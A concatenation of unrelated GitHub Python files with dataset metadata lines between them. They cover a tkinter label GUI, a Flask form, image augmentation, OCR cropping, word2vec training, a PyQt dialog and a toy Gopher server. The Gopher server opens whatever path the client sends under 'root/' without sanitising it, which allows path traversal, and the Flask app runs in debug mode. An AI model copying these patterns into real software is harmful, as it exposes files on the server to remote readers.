def toggle_field_5():
    """Show/enable the free-text field only when the date checkbox is off."""
    if not add_date_var.get():
        # Reveal the alternative field and make it editable.
        alt_field_for_date.grid(row=6, column=1)
        alt_field_for_date.configure(state='normal')
    else:
        # The print date is used instead: hide the free-text field.
        alt_field_for_date.grid_remove()
# Main window creation
root = tk.Tk()
# root.geometry("600x400")
root.title("Générateur d'étiquettes")
# Printer selection
printer_frame = ttk.Frame(root)
printer_frame.grid(row= 0, column=0, rowspan=2, columnspan=2)
label_printer = ttk.Label(printer_frame, text="Sélectionnez l'imprimante :")
label_printer.grid(row = 0, column = 0, pady = 30, sticky='W')
# printer_list = ["Imprimante1", "Imprimante2", "Imprimante3"] # Replace with your real printers
selected_printer = tk.StringVar(value=printer_list[0])
printer_menu = ttk.Combobox(printer_frame, textvariable=selected_printer, values=printer_list)
printer_menu.grid(row = 0, column = 1, sticky='W')
# Input fields to fill in
entry_frame = ttk.Frame(root)
entry_frame.grid(pady=20, padx= 50)
label_fields = ttk.Label(entry_frame, text="Remplissez les champs :")
label_fields.grid(row=1, column=0, rowspan=3)
entry_field_1 = ttk.Entry(entry_frame, width=11)
entry_field_1.insert(0, "25121245")
entry_field_1.grid(row=1, column=1, sticky='W')
entry_field_2 = ttk.Entry(entry_frame, width=2) # field 2 limited to 2 characters
entry_field_2.insert(0, "98")
entry_field_2.grid(row=1, column=2, sticky='W')
entry_field_3 = ttk.Entry(entry_frame, width=24)
entry_field_3.insert(0, "TEST second")
entry_field_3.grid(row=2, column=1 )
entry_field_4 = ttk.Entry(entry_frame, width=20)
entry_field_4.insert(0, "31/12/1964 M")
entry_field_4.grid(row=3, column=1, sticky='W' )
# Option to print today's date
add_date_var = tk.BooleanVar(value = True)
add_date_checkbox = ttk.Checkbutton(entry_frame, text="Ajouter la date du jour", variable=add_date_var,
                                    command=toggle_field_5)
add_date_checkbox.grid(row=5, column=1)
# Free-text field used instead of the date (initially greyed out)
label_field_5 = ttk.Label(entry_frame, text="Champ libre :")
label_field_5.grid(row=6, column=0)
alt_field_for_date = ttk.Entry(entry_frame, width=20,
                               state="disabled"
                               )
alt_field_for_date.grid(row=6, column=1)
# Field for the number of labels to print
last_frame = ttk.Frame(root)
last_frame.grid(pady=20)
label_nb_labels = ttk.Label(last_frame, text="Nombre d'étiquettes à imprimer :")
label_nb_labels.grid(row= 0, column= 0)
entry_nb_labels = ttk.Entry(last_frame, width=5)
entry_nb_labels.insert(0, "3") # default value
entry_nb_labels.grid(row= 0, column= 1, sticky='W')
# Print button
bottom_frame = ttk.Frame(root)
bottom_frame.grid(pady=20)
print_button = ttk.Button(bottom_frame, text="Imprimer", command=print_labels)
print_button.grid(row= 1, column = 1)
root.mainloop()
input("") | bermau/py_liq_dilutions | tk_label.py | tk_label.py | py | 5,100 | python | fr | code | 0 | github-code | 36 |
6971950883 | '''creating a form using flask to get username and password using html
and displaying success on submitting'''
from flask import Flask, redirect, render_template, request
app = Flask(__name__)
@app.route('/')
def home():
    """Serve the login form page."""
    return render_template("index.html")
@app.route("/success", methods = ['POST', "GET"])
def success():
if request.method == 'POST':
result = request.form
uname = request.form['username']
return render_template("success.html", result= result, username=uname)
if __name__ == '__main__':
    # debug=True enables the reloader and interactive debugger -- dev only.
    app.run(debug=True)
24331960093 | from argparse import ArgumentParser
from ast import parse
import os
def handle_file(filename: str, blank: list[str]):
    """Rewrite *filename* in place.

    The new content is '[' + the quoted *blank* entries + a blank line,
    followed by the stripped lines that appeared AFTER the first blank
    line of the old file (bracket lines are dropped), then ']'.
    """
    with open(filename) as fh:
        original_lines = fh.readlines()
    rebuilt = ['[']
    rebuilt += [f'"{entry}",' for entry in blank]
    rebuilt.append('\n')
    past_blank = False
    for raw in original_lines:
        # Bracket lines belong to the old wrapper -- never copied over.
        if '[' in raw or ']' in raw:
            continue
        if raw == '\n':
            # First blank line marks where the kept section begins.
            past_blank = True
            continue
        if not past_blank:
            continue
        rebuilt.append(raw.strip())
    rebuilt.append(']\n')
    with open(filename, 'w') as fh:
        fh.write('\n'.join(rebuilt))
if __name__ == '__main__':
    parser = ArgumentParser(description='Update all templates based on the blank template')
    parser.add_argument(type=str, dest='filename', help='blank template')
    args = parser.parse_args()
    blank_file = args.filename
    # Strip the bracket/quote/comma decoration from the blank template,
    # leaving one entry per line.
    with open(blank_file) as f:
        blank = f.read().replace('[', '').replace(']', '').replace('"', '').replace(',' , '').strip().split('\n')
    # NOTE(review): os.walk yields names relative to each directory, so
    # .txt files in subdirectories would fail to open here -- confirm all
    # templates live in the current directory.
    for _, _, files in os.walk('.'):
        for filename in files:
            if filename == blank_file:
                continue
            if filename.endswith('.txt'):
                print(filename)
                handle_file(filename, blank)
| zeusops/mission-templates | limited-arsenal-factions/update.py | update.py | py | 1,430 | python | en | code | 3 | github-code | 36 |
30249155883 | import cv2
import os
import numpy as np
import PIL.Image
from PIL import ImageEnhance
# per ogni immagine presente nella cartella crea una foto più luminosa e una meno luminosa
def imageBrightener(pathImmagine, pathContorno, pathSalvataggio, pathSalvataggioContorno):
    """Create a darkened (x0.75) and a brightened (x1.25) copy of each image.

    pathImmagine: source images; pathContorno: matching outline PNGs.
    Output goes to pathSalvataggio / pathSalvataggioContorno with
    `_darkened` / `_brightened` suffixes (outlines are copied unchanged).
    """
    os.chdir(pathImmagine)
    files = os.listdir()
    chiara = 1.25  # enhancement factor for the brighter copy
    scura = 0.75  # enhancement factor for the darker copy
    i = 1
    lenFiles = len(files)
    for file in files:
        print(f'Immagine {i} di {lenFiles}')
        img = PIL.Image.open(pathImmagine + "\\" + file)
        # image brightness enhancer
        enhancer = ImageEnhance.Brightness(img)
        im_output = enhancer.enhance(scura)
        if im_output.mode != 'RGB':
            im_output = im_output.convert('RGB')
        save = f'{pathSalvataggio}\\{file[:len(file) - 4]}_darkened.jpg'
        # PIL image -> OpenCV BGR array so cv2.imwrite can save it.
        opencvImage = cv2.cvtColor(np.array(im_output), cv2.COLOR_RGB2BGR)
        cv2.imwrite(save, opencvImage)
        # Duplicate the outline under each generated variant's name.
        contorno = cv2.imread(f'{pathContorno}\\{file[:len(file) - 4]}.png')
        cv2.imwrite(f'{pathSalvataggioContorno}\\{file[:len(file) - 4]}_darkened.png', contorno)
        im_output2 = enhancer.enhance(chiara)
        opencvImage2 = cv2.cvtColor(np.array(im_output2), cv2.COLOR_RGB2BGR)
        cv2.imwrite(f'{pathSalvataggio}\\{file[:len(file) - 4]}_brightened.jpg', opencvImage2)
        cv2.imwrite(f'{pathSalvataggioContorno}\\{file[:len(file) - 4]}_brightened.png', contorno)
        i += 1
# per ogni immagine presente nella cartella crea una foto più luminosa e una meno luminosa
def imageContrast(pathImmagine, pathContorno, pathSalvataggio, pathSalvataggioContorno):
    """Create a lower- (x0.75) and higher-contrast (x1.25) copy of each image.

    Mirrors imageBrightener but uses ImageEnhance.Contrast and the
    `_lessContrast` / `_moreContrast` suffixes.
    """
    os.chdir(pathImmagine)
    files = os.listdir()
    chiara = 1.25  # enhancement factor for the higher-contrast copy
    scura = 0.75  # enhancement factor for the lower-contrast copy
    i = 1
    lenFiles = len(files)
    for file in files:
        print(f'Immagine {i} di {lenFiles}')
        img = PIL.Image.open(pathImmagine + "\\" + file)
        # image contrast enhancer
        enhancer = ImageEnhance.Contrast(img)
        im_output = enhancer.enhance(scura)
        if im_output.mode != 'RGB':
            im_output = im_output.convert('RGB')
        save = f'{pathSalvataggio}\\{file[:len(file) - 4]}_lessContrast.jpg'
        opencvImage = cv2.cvtColor(np.array(im_output), cv2.COLOR_RGB2BGR)
        cv2.imwrite(save, opencvImage)
        # Duplicate the outline under each generated variant's name.
        contorno = cv2.imread(f'{pathContorno}\\{file[:len(file) - 4]}.png')
        cv2.imwrite(f'{pathSalvataggioContorno}\\{file[:len(file) - 4]}_lessContrast.png', contorno)
        im_output2 = enhancer.enhance(chiara)
        opencvImage2 = cv2.cvtColor(np.array(im_output2), cv2.COLOR_RGB2BGR)
        cv2.imwrite(f'{pathSalvataggio}\\{file[:len(file) - 4]}_moreContrast.jpg', opencvImage2)
        cv2.imwrite(f'{pathSalvataggioContorno}\\{file[:len(file) - 4]}_moreContrast.png', contorno)
        i += 1
# rupta l'immagine di un angolo dato in input
def rotateAngle(img, angle, color):
    """
    Rotates an image (angle in degrees) and expands image to avoid cropping

    *color* fills the border area exposed by the rotation.
    """
    height, width = img.shape[:2] # image shape has 3 dimensions
    image_center = (width/2, height/2) # getRotationMatrix2D needs coordinates in reverse order (width, height) compared to shape
    rotation_img = cv2.getRotationMatrix2D(image_center, angle, 1.)
    # rotation calculates the cos and sin, taking absolutes of those.
    abs_cos = abs(rotation_img[0,0])
    abs_sin = abs(rotation_img[0,1])
    # find the new width and height bounds
    bound_w = int(height * abs_sin + width * abs_cos)
    bound_h = int(height * abs_cos + width * abs_sin)
    # subtract old image center (bringing image back to origo) and adding the new image center coordinates
    rotation_img[0, 2] += bound_w/2 - image_center[0]
    rotation_img[1, 2] += bound_h/2 - image_center[1]
    # rotate image with the new bounds and translated rotation matrix
    rotated_img = cv2.warpAffine(img, rotation_img, (bound_w, bound_h), borderValue=color)
    return rotated_img
# crea tutte le rotazioni dell'immagine di partenza
def createImageRotations(path, pathSalvataggio, color, extension):
    """Save rotated copies (fixed angle set) of every image in *path*.

    *color* fills borders exposed by the rotation; *extension* is the
    output file extension (e.g. '.png').
    """
    angles = [30, 45, 60, 120, 150, 270]
    os.chdir(path)
    files = os.listdir()
    i = 1
    for file in files:
        # NOTE(review): "su 515" hard-codes the expected dataset size.
        print("Immagine numero: " + str(i) + "su 515")
        filePath = path + "\\" + file
        savePath = pathSalvataggio + "\\" + file
        print(savePath)
        original = cv2.imread(filePath)
        if original is None:
            # Byte-level fallback -- presumably for paths cv2.imread cannot
            # handle (e.g. non-ASCII characters); TODO confirm.
            stream = open(filePath, "rb")
            bytesArray = bytearray(stream.read())
            numpyarray = np.asarray(bytesArray, dtype=np.uint8)
            original = cv2.imdecode(numpyarray, cv2.IMREAD_UNCHANGED)
        for angle in angles:
            img = rotateAngle(original, angle, color)
            cv2.imwrite(savePath[:len(savePath) - 4] + "_" + str(angle) + extension, img)
        i = i + 1
# permette di specchiare le immagini
def flipImages(path, pathSalvataggio, extension):
    """Save a horizontally mirrored copy (`_flipped` suffix) of each image.

    NOTE(review): unlike createImageRotations, `path + file` has no
    separator -- callers must pass *path* with a trailing backslash (the
    main block below does).
    """
    os.chdir(path)
    files = os.listdir()
    i = 1
    for file in files:
        print("Immagine numero: " + str(i))
        filePath = path + file
        savePath = pathSalvataggio + "\\" + file
        print(savePath)
        original = cv2.imread(filePath)
        if original is None:
            # Byte-level fallback when cv2.imread fails on the path.
            stream = open(filePath, "rb")
            bytesArray = bytearray(stream.read())
            numpyarray = np.asarray(bytesArray, dtype=np.uint8)
            original = cv2.imdecode(numpyarray, cv2.IMREAD_UNCHANGED)
        img = cv2.flip(original, 1)
        cv2.imwrite(savePath[:len(savePath) - 4] + "_flipped" + extension, img)
        i = i + 1
# salvare immagini e aprirle con cv2
# per ogni immagine
# per ogni angolo
# ruota immagine e salva
if __name__ == '__main__':
    dirname = os.path.dirname(__file__)
    # Outline (mask) images and their augmented output folder.
    pathContorni = os.path.join(dirname, 'Dataset\\Contorni\\')
    pathNuoviContorni =os.path.join(dirname, 'Dataset\\ContorniRotazione\\')
    # Original photos and their augmented output folder.
    pathOriginali = os.path.join(dirname, 'Dataset\\JPEGImages\\')
    pathOriginaliRotazione = os.path.join(dirname, 'Dataset\\JPEGRotazione\\')
    # Rotations: (0,0,0) fill for outlines, (0,0,255) fill for photos.
    createImageRotations(pathContorni, pathNuoviContorni, (0,0,0), '.png')
    createImageRotations(pathOriginali, pathOriginaliRotazione, (0,0,255), '.jpg')
    # Mirror both the freshly rotated sets and the original sets.
    print("Nuovi contorni")
    flipImages(pathNuoviContorni, pathNuoviContorni, ".png")
    print("Contorni")
    flipImages(pathContorni, pathNuoviContorni, ".png")
    print("Ruotate")
    flipImages(pathOriginaliRotazione, pathOriginaliRotazione, ".jpg")
    print("Originali")
    flipImages(pathOriginali, pathOriginaliRotazione, ".jpg")
    # Brightness and contrast variants for both original and rotated sets.
    imageBrightener(pathOriginaliRotazione, pathNuoviContorni, pathOriginaliRotazione, pathNuoviContorni)
    imageBrightener(pathOriginali, pathContorni, pathOriginaliRotazione, pathNuoviContorni)
    imageContrast(pathOriginaliRotazione, pathNuoviContorni, pathOriginaliRotazione, pathNuoviContorni)
    imageContrast(pathOriginali, pathContorni, pathOriginaliRotazione, pathNuoviContorni)
| ApulianGCC/TesiSegmentazionePinna | data_augmentation.py | data_augmentation.py | py | 6,913 | python | it | code | 0 | github-code | 36 |
30692147773 | from odoo.tests.common import TransactionCase
class TestNlLocationNuts(TransactionCase):
    """Tests binding Dutch provinces to level-3 NUTS regions."""
    def setUp(self):
        """Create the Noord-Brabant state and run the NUTS importer."""
        super(TestNlLocationNuts, self).setUp()
        self.env['res.country.state'].create({
            'name': 'Noord-Brabant',
            'code': 'NB',
            'country_id': self.env.ref('base.nl').id
        })
        importer = self.env['nuts.import']
        importer.run_import()
    def test_dutch_nuts(self):
        """
        Test that level 3 nuts correctly bind Dutch provinces.
        """
        # NL41 -- expected to map onto the Noord-Brabant state created in setUp.
        self.nb_nuts = self.env['res.partner.nuts'].search(
            [('code', '=', 'NL41')])
        self.assertTrue(self.nb_nuts)
        self.assertTrue(self.nb_nuts.state_id)
        self.nl_partner = self.env['res.partner'].create({
            'name': 'Dutch Partner',
            'country_id': self.env.ref('base.nl').id
        })
        self.nl_partner.state_id = self.nb_nuts.state_id
        # Onchange method binds level 3 nuts with Dutch provinces.
        self.nl_partner.onchange_state_id_base_location_nuts()
        self.assertEqual(
            self.nl_partner.state_id,
            self.nl_partner.nuts3_id.state_id)
| pscloud/l10n-netherlands | l10n_nl_location_nuts/tests/test_l10n_nl_location_nuts.py | test_l10n_nl_location_nuts.py | py | 1,171 | python | en | code | null | github-code | 36 |
34998272866 | # Import packages
import cv2
import numpy as np
from PIL import Image
from pytesseract import pytesseract
from pytesseract import Output
if __name__ == "__main__":
img = cv2.imread('shelf_for_rectangles.jpg')
print(img.shape) # Print image shape
cv2.imshow("original", img)
# Cropping an image
# cropped_image = img[35:75, 65:275] #1
# cropped_image = img[35:75, 285:495] #2
# cropped_image = img[35:75, 495:705] #3
# cropped_image = img[35:75, 715:925] #4
# cropped_image = img[175:215, 65:275] #LCD 5
# cropped_image = img[175:215, 285:495] # 6
# cropped_image = img[175:215, 495:705] #7
# cropped_image = img[175:215, 715:925] #8
# cropped_image = img[310:345, 65:275] #9 battery
# cropped_image = img[310:345, 285:495] #10
# cropped_image = img[310:345, 495:705] #11
# cropped_image = img[310:345, 715:925] #12
# cropped_image = img[450:485, 153:300] #13 joystick
# cropped_image = img[450:485, 395:620] #14
# cropped_image = img[450:495, 670:910] #15
# cropped_image = img[630:675, 420:590] #16 arduino
#list with positions : pos (upper left corner) for all signs
signs = [[35,65],]
w = 210 #width sign
h = 40 #hight sign
# A text file is created and flushed
file = open("signs_position_name.txt", "w+")
file.write("")
file.close()
# Creating a copy of image
im2 = img.copy()
for pos in signs:
y = pos[0]
x = pos[1]
mid_x = x + w/2
mid_x = str(int(mid_x))
mid_y = y + h/2
mid_y = str(int(mid_y))
cropped = im2[y:y + h, x:x + w]
text = pytesseract.image_to_string(cropped)
file = open("signs_position_name.txt", "a")
if text == '':
continue
# Appending the text into file
file.write(text + ' - ' + mid_x + ',' + mid_y + ',90')
file.close()
# Display cropped image
cv2.imshow("cropped", cropped_image)
# Save the cropped image
cv2.imwrite("Cropped Image.jpg", cropped_image)
cv2.waitKey(0)
#cv2.destroyAllWindows()
imgGray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
def tesseract():
    """OCR 'Cropped Image.jpg' via a hard-coded Windows tesseract binary and
    print the recognized text (dropping the final character, presumably a
    trailing newline)."""
    path_to_tesseract = r"C:\Program Files\Tesseract-OCR\tesseract.exe"
    image_path = 'Cropped Image.jpg'
    pytesseract.tesseract_cmd = path_to_tesseract
    text = pytesseract.image_to_string(Image.open(image_path))
    print(text[:-1])
tesseract()
3325760856 | from django.contrib import admin
from .models import Review
# Register your models here.
class ReviewAdmin(admin.ModelAdmin):
    """Admin change-list configuration for product reviews."""
    # Columns shown in the review change list.
    list_display = (
        'product',
        'user',
        'rating',
        'title',
        'description',
        'review_date',
    )
    # Default ordering of the list view.
    ordering = ('product',)
admin.site.register(Review, ReviewAdmin)
| mosull20/crushed-grapes-ms4 | reviews/admin.py | admin.py | py | 343 | python | en | code | 0 | github-code | 36 |
13565958708 | # Author: Joshua Jackson
# Date: 06/20/2020
# This file will contain the class which create Word2Vec file using gensim
from gensim.models import Word2Vec
from gensim.models.phrases import Phrases, Phraser
from datetime import datetime
# script to create word embeddings for Neural Network weight
class word2vec:
    """Builds and saves a bigram word2vec embedding model with gensim."""

    def __init__(self, debug=False):
        # Flag reserved for verbose/debug output by callers.
        self.debug = debug

    #using a pre tokenized list create the word2vec training data
    def create_bigram_embedding(self, tokens, emb_size=250, minCount=1, threshold_amount=1, workers=3, algo=0, window=5):
        """Train a Word2Vec model on bigram-merged *tokens* and save it.

        tokens: pre-tokenized sentences (list of lists of str).
        emb_size: embedding dimensionality (gensim 3.x `size` parameter).
        minCount: ignore tokens with total frequency below this.
        threshold_amount: phrase-detection score threshold.
        workers: training thread count.
        algo: 0 = CBOW, 1 = skip-gram (gensim `sg` parameter).
        window: context window size.

        Returns the trained Word2Vec model, or None on failure.
        """
        try:
            # Detect frequently co-occurring token pairs...
            phrases = Phrases(tokens, min_count=minCount, threshold=threshold_amount)
            # ...and build a lightweight transformer that merges them into bigrams.
            bigram = Phraser(phrases)
            model = Word2Vec(bigram[tokens],
                             size=emb_size,
                             window=window,
                             min_count=minCount,
                             workers=workers,
                             sg=algo)
            timestampStr = datetime.now().strftime("%d-%b-%Y")
            # BUGFIX: Word2Vec.save() takes no `binary` argument -- the old
            # calls raised TypeError, which the except below swallowed, so no
            # file was ever written.  The word2vec-format export lives on the
            # model's KeyedVectors (`model.wv`).
            model.wv.save_word2vec_format(f'bigram-model-{timestampStr}.bin', binary=True)
            model.wv.save_word2vec_format(f'bigram-model-{timestampStr}.txt', binary=False)
            return model
        except Exception as e:
            # Message fixed to name the actual method.
            print(f"Something went wrong in create_bigram_embedding: {e}")
| jjacks95/sentiment-analysis-financial-news | financialTextProcessing/financialTextProcessing/createWord2Vec.py | createWord2Vec.py | py | 1,730 | python | en | code | 3 | github-code | 36 |
41801368948 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 9 14:49:52 2023
@author: intern
"""
import cv2
# NOTE(review): this is a Spyder cell script -- `np`, `plt`, `rgb_to_hsv`
# and `im0` are expected in the interactive namespace; the file has no
# imports for them and does not run standalone.
kernel = np.ones((3, 3), dtype=np.uint8)
erosion = cv2.erode(im0, kernel, iterations=1)
plt.imshow( erosion[:,:,0:3])
#%%
# Morphological opening (erosion then dilation) as an alternative filter.
erosion = cv2.morphologyEx(im0, cv2.MORPH_OPEN, kernel, 1)
plt.imshow( erosion[:,:,0:3])
hsvim = rgb_to_hsv(erosion[:,:,0:3])
#%%
float("0.5555554573")
a = format(float("0.5555554573"), '.6f')
945909782 | pkgname = "libsbsms"
pkgver = "2.3.0"
pkgrel = 0
build_style = "cmake"
hostmakedepends = [
"cmake",
"ninja",
"pkgconf",
]
pkgdesc = "Library for high quality time and pitch scale modification"
maintainer = "psykose <alice@ayaya.dev>"
license = "GPL-2.0-or-later"
url = "https://github.com/claytonotey/libsbsms"
source = (
f"https://github.com/claytonotey/libsbsms/archive/refs/tags/{pkgver}.tar.gz"
)
sha256 = "4f88d152bc06fedbda9d5d65517d40254a7310c9050601a93122309d45afd2c9"
# vis breaks symbols
hardening = []
# no tests
options = ["!check"]
@subpackage("libsbsms-devel")
def _devel(self):
return self.default_devel()
| chimera-linux/cports | contrib/libsbsms/template.py | template.py | py | 643 | python | en | code | 119 | github-code | 36 |
37662015618 | from PyQt5.QtWidgets import QDialog, QComboBox, QPushButton, QRadioButton
from pulse.utils import error
from os.path import basename
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import Qt
from PyQt5 import uic
import configparser
class ElementTypeInput(QDialog):
    """Modal dialog for choosing the structural element type ('pipe_1',
    'pipe_2' or 'shell') and whether it applies to all entities or one."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        uic.loadUi('pulse/uix/user_input/ui/elementTypeInput.ui', self)
        icons_path = 'pulse\\data\\icons\\'
        self.icon = QIcon(icons_path + 'pulse.png')
        self.setWindowIcon(self.icon)
        # Defaults match the first combo entry.
        self.index = 0
        self.element_type = 'pipe_1'
        self.comboBox = self.findChild(QComboBox, 'comboBox')
        self.comboBox.currentIndexChanged.connect(self.selectionChange)
        self.index = self.comboBox.currentIndex()
        self.radioButton_all = self.findChild(QRadioButton, 'radioButton_all')
        self.radioButton_entity = self.findChild(QRadioButton, 'radioButton_entity')
        self.radioButton_all.toggled.connect(self.radioButtonEvent)
        self.radioButton_entity.toggled.connect(self.radioButtonEvent)
        self.flagAll = self.radioButton_all.isChecked()
        self.flagEntity = self.radioButton_entity.isChecked()
        self.pushButton_2 = self.findChild(QPushButton, 'pushButton_confirm')
        self.pushButton_2.clicked.connect(self.button_clicked)
        # Blocks until the dialog is dismissed.
        self.exec_()
    def radioButtonEvent(self):
        """Mirror the radio buttons into the flagAll/flagEntity booleans."""
        self.flagAll = self.radioButton_all.isChecked()
        self.flagEntity = self.radioButton_entity.isChecked()
    def keyPressEvent(self, event):
        """Enter/Return confirms the dialog; Escape closes it."""
        if event.key() == Qt.Key_Enter or event.key() == Qt.Key_Return:
            self.check()
        elif event.key() == Qt.Key_Escape:
            # self.index = -1
            self.close()
    def selectionChange(self, index):
        """Map the current combo-box index to the element type string."""
        self.index = self.comboBox.currentIndex()
        if self.index == 0:
            self.element_type = 'pipe_1'
        elif self.index == 1:
            self.element_type = 'pipe_2'
        elif self.index == 2:
            self.element_type = 'shell'
    def check(self):
        """Accept the current selection and dismiss the dialog."""
        self.close()
    def button_clicked(self):
        self.check()
72416805225 | # -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
import numpy as np
def approach_angle_reward(roll, pitch):
    """Piecewise reward on the combined tilt |roll| + |pitch| (radians)."""
    tilt = np.abs(roll) + np.abs(pitch)
    if tilt < 0.174:
        # Near-level: large positive reward growing as the tilt shrinks.
        return 100 * np.exp(7.0 * (0.174 - tilt))
    if 0.174 <= tilt <= 1.55:
        # Moderate tilt: exponentially growing penalty.
        return -6.0 * np.exp(3.2 * (tilt - 0.174))
    if tilt > 1.55:
        # Extreme tilt: flat large penalty.
        return -500.0
def flip_reward(angle, prev_angle):
    """Reward on |angle| during the flip phase.

    *prev_angle* is unused but kept for call-site compatibility.
    """
    deviation = np.abs(angle)
    if deviation < 0.26:
        # Close to target angle: sharply growing positive reward.
        return 0.05 * np.exp(20 * (0.26 - deviation))
    if deviation >= 0.26:
        # Past the tolerance: exponentially growing penalty.
        return -7.0 * np.exp(2.1 * (deviation - 0.26))
def approach_velocity_reward(velocity):
    """Piecewise reward on the approach velocity."""
    if velocity > 1.6:
        # Far too fast: large penalty growing with speed.
        return -20.0 * np.exp(0.45 * np.abs(velocity))
    if 0.1 <= velocity <= 1.6:
        # Moderate speed: penalty growing with the excess over 0.1.
        return -12.5 * np.exp(2.1 * (velocity - 0.1))
    if velocity < 0.1:
        # Slow enough: strong positive reward.
        return 55.0 * np.exp(20 * (0.1 - velocity))
# approach angle
#roll_space = np.linspace(-1.57,1.57,300)
#pitch_space = np.linspace(-1.57,1.57,300)
#X,Y = np.meshgrid(roll_space,pitch_space)
#
#Z = np.zeros(shape = (len(roll_space),len(pitch_space)))
#for it_r,r in enumerate(roll_space):
# for it_p,p in enumerate(pitch_space):
# Z[it_r,it_p] = approach_angle_reward(r,p)
# calculate angle_space for flipping
#angle_space = np.linspace(-3.14,3.14,500)
#dummy_space = np.linspace(-3.14,3.14,500)
#
#
#X,Y = np.meshgrid(angle_space,dummy_space)
#Z = np.zeros(shape = (len(angle_space),len(dummy_space)))
#
#for it_a1,a1 in enumerate(angle_space):
# for it_a2,a2 in enumerate(dummy_space):
# Z[it_a1,it_a2] = flip_reward(a1,a2)
# approach velocity
# Sample the velocity reward on a grid; the dummy/y axis only replicates
# the 1-D curve so it can be rendered as a 2-D colour map.
vel_space = np.linspace(0.0,10,500)
dummy_space = np.linspace(0.0,10,500)
X,Y = np.meshgrid(vel_space,dummy_space)
Z = np.zeros(shape = (len(vel_space),len(dummy_space)))
for it_a1,a1 in enumerate(vel_space):
    for it_a2,a2 in enumerate(dummy_space):
        Z[it_a1,it_a2] = approach_velocity_reward(a1)
fig, ax = plt.subplots(figsize=(7, 7), dpi=100)
# for positive values
p = ax.pcolor(X, Y, Z, cmap=plt.cm.RdBu, vmin=(Z).min(), vmax=(Z).max())
#p = ax.pcolor(X, Y, Z, cmap=plt.cm.RdBu, vmin=Z.min(), vmax=Z.max())
cb = fig.colorbar(p)
#cnt = plt.contour(Z, cmap=plt.cm.RdBu, vmin=abs(Z).min(), vmax=abs(Z).max(), extent=[0, 1, 0, 1])
| Zbigor/DeepRL_UAV_landing | drl_landing/rl_pipeline/catkin_ws/src/hummingbird/scripts/plot_reward_functions.py | plot_reward_functions.py | py | 2,384 | python | en | code | 2 | github-code | 36 |
10876940486 | """
A Gopher Server written in Python
author: Julia Connelly, Adante Ratzlaff, Jack Wines
CS 331, Spring 2018
date: 12 April 2018
"""
import sys
import socket
import os
class GopherServer:
    """Minimal Gopher protocol server serving files from the `root/` tree."""
    def __init__(self, port=50000):
        self.port = port
        self.host = ""  # bind on all interfaces
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((self.host, self.port))
        # Pre-rendered directory listing for the root selector.
        self.links = GopherServer.readLinks("root/")
    @staticmethod
    def cleanLinksFile(s):
        """Sort the .links entries and clamp the first two tab-separated
        columns to fixed lengths, re-joining with CRLF line endings."""
        cleanLinks = ""
        splitLines = s.split("\n")
        splitLines.sort()
        for line in splitLines:
            splitLine = line.split("\t")
            properLengths = [70 - 1, 225 - 1]
            for name, length, i in zip(splitLine[:2], properLengths, range(2)):
                splitLine[i] = name[:length]
            cleanLinks += "\t".join(splitLine) + "\r\n"
        return cleanLinks
    @staticmethod
    def readLinks(linksPath):
        """Return the cleaned `.links` listing for a directory, or None."""
        try:
            with open(linksPath + ".links", "r") as linksFile:
                return GopherServer.cleanLinksFile(linksFile.read())
        except OSError:
            return None
    @staticmethod
    def readFile(filePath):
        """Return a file's text (read as ASCII, errors ignored), or None."""
        try:
            with open(filePath, "r", encoding = "ascii", errors = "ignore") as file:
                return file.read()
        except OSError:
            return None
    @staticmethod
    def getResponse(filePath):
        """Resolve a selector under root/: directory listing or file body."""
        filePath = "root/" + filePath.replace("\r", "").replace("\n", "")
        if os.path.isdir(filePath):
            return GopherServer.readLinks(filePath)
        else:
            return GopherServer.readFile(filePath)
    @staticmethod
    def addPeriodOnNewLine(resp):
        """Append the Gopher end-of-response terminator ('.' on its own line)."""
        return resp + "\r\n."
    # returns None (and notifies the client) if decoding fails
    @staticmethod
    def safeDecode(data, clientSock):
        try:
            return data.decode(encoding = "ascii", errors = "ignore")
        except UnicodeDecodeError:
            # NOTE(review): the message says utf-8 but the decode above is
            # ascii; with errors="ignore" this branch is effectively
            # unreachable.
            errStr = "Error decoding from utf-8\r\n"
            print(errStr, file=sys.stderr)
            clientSock.sendall(errStr.encode('ascii'))
            return None
    # returns an error string and prints if fails
    @staticmethod
    def safeEncode(s):
        try:
            return s.encode('ascii', errors = "ignore")
        except UnicodeEncodeError:
            errStr = "Error encoding to utf-8. str: "
            print(errStr, s, "\r\n", file=sys.stderr)
            return errStr.encode('ascii', errors = "ignore")
    def listen(self):
        """Accept clients forever; one request and response per connection."""
        self.sock.listen(5)
        while True:
            clientSock, clientAddr = self.sock.accept()
            print("Connection received from ", clientSock.getpeername())
            data = clientSock.recv(1024)
            # try to decode data (ascii, errors ignored)
            decodedData = GopherServer.safeDecode(data, clientSock)
            if not decodedData:
                continue
            # A whitespace-only selector means: send the root .links listing.
            # NOTE(review): a truly empty request is already skipped by the
            # `if not decodedData` check above, so the classic empty-line
            # Gopher root request never reaches this branch.
            if decodedData.strip() == "":
                toSend = GopherServer.safeEncode(GopherServer.addPeriodOnNewLine(self.links))
                clientSock.sendall(toSend)
            else:
                info = GopherServer.getResponse(decodedData)
                if info:
                    clientSock.sendall(GopherServer.safeEncode(GopherServer.addPeriodOnNewLine(info)))
                else:
                    clientSock.sendall(
                        GopherServer.addPeriodOnNewLine("Received file path does not exist.\r\n").encode('ascii'))
            clientSock.close()
def main():
    """Create a GopherServer (optionally on the port given as argv[1],
    falling back to the default on a bad value) and listen forever."""
    server = None
    if len(sys.argv) > 1:
        try:
            server = GopherServer(int(sys.argv[1]))
        except ValueError:
            print("Error in specifying port. Creating server on default port.")
    if server is None:
        server = GopherServer()
    print("Listening on port " + str(server.port))
    server.listen()
main()
| connellyj/gopher | gopherServer.py | gopherServer.py | py | 4,062 | python | en | code | 0 | github-code | 36 |
8559847117 | #!/usr/bin/env python3.11
"""
Video Command Invoker (Command Design Pattern)
This Python script defines the `VideoInvoker` class, a central component in the Command
design pattern for executing video-related commands. It manages the video generation
process and serves as the invoker in the pattern.
The `VideoInvoker` class provides methods for executing video commands, including
starting subshells, running code animations, and interacting with a web browser to
create instructional videos. It collaborates with classes like `CodeAnimationGenerator`,
